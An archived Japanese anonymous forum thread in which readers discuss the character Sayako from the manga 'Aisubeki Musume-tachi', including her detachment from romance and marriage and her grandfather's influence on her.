莢子の場合、やせ我慢は必要なく本音で「すべき行動(理想的な行動)」をまんべんなく行えてしまう。
逆に言うと「意識的に誰かをえこひいきする(=恋愛)」は彼女には出来ない。
恋愛の相手から「自分をえこひいきする」事を求められ応えれらない「自分を責める目」をしていた莢子が
お見合いの結果とてもとてもいい人に巡り会ったからこそ「自分には結婚は出来ない(その機能が付いてない)」と実感してしまったのだと思った。

人間離れした「聖女」だったから結婚と恋愛のない世界に身を置いてようやく自分らしく顔を上げられたんだと思った。

670 :花と名無しさん:2007/01/24(水) 21:04:08 ID:???0
>>669
最後の一文に超同意っす。
私自身は、この話はとても切ない話だと思った。友人の視点で読んだから。
もちろん、莢子自身はやっと自分と世間と折り合いをつける道を見つけて、やっと楽になったし、
自分の人生を昇華できたのだと思う。よい悪いではなく、根本的に恋愛思想に相容れなかっただ
け。それなのに切ないのは、彼女の苦しさが伝わってきたから。
相手を傷つけるつもりがないのに傷つけてしまう辛さ、寄る辺ない苦しさ、自分が間違っている
のでは?周りの人の幸せは?と考えたであろうこと。人々が恋と呼ぶ感情ですら、自分と相容れ
ないと見て、自分で背を向けてしまったんだろうと思う。
彼女にとっては人生の前進。それは多くの人を愛して、同時に決別することなのだと思う。

671 :花と名無しさん:2007/01/25(木) 00:20:02 ID:???0
あのおじいさんは「間違っていたのかもしれない」って
信念を持って拷問に耐えた時期から数十年
時代の流れを見てきての言葉かなと思った。
変節した訳じゃなく、理想としてはあるんだろうけど
社会主義国の崩壊を見るに付けて一歩引いた考え方になったのかと。

莢子さんは素直に愚直に尊敬する祖父の教えに従ったら
「自分」という個人を優先する事が難しくなったのかな。
ちょっとトラウマに近いような刷り込みに見えた。

672 :花と名無しさん:2007/01/25(木) 00:39:33 ID:???0
なんか天人唐草のような人間性だったのかもしれん
あっちは狂っちゃったけど

673 :花と名無しさん:2007/01/25(木) 00:52:59 ID:???0
「愛すべき娘たち」一冊全部が「色んな人がそれぞれの居場所を求める話」だと思ってます。
莢子の場合も、普通の世の中では生きにくかった彼女が自分の居場所を見いだしたから彼女的にはハッピーエンドではないかと。

自分があの話を初めて読んだ時反射的に思い出したのは
純正のホモの人が親しい女の子から告られて迫られて抱きつかれて泣かれて
相手のことは人間として好きだけどどうしても欲情の対象にはならない、でもいい子なのになんで泣かしちゃうんだろう…と自分を責めた、という話でした。

163 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)